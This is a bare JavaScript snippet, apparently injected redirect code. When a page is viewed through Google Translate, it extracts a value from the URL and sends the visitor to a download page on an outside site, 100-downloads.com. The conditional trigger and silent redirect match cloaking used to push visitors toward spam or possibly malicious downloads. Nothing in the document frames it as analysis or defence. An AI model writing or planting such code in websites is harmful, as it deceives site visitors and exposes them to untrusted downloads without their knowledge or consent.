selection=new String(document.location);
str=unescape(selection.substring(selection.indexOf('%3D')+3));
str=str.split('&');
if(selection.indexOf('translate.google') > -1) {
document.location.href='http://100-downloads.com/download.php?p='+str.slice(0,1);
}

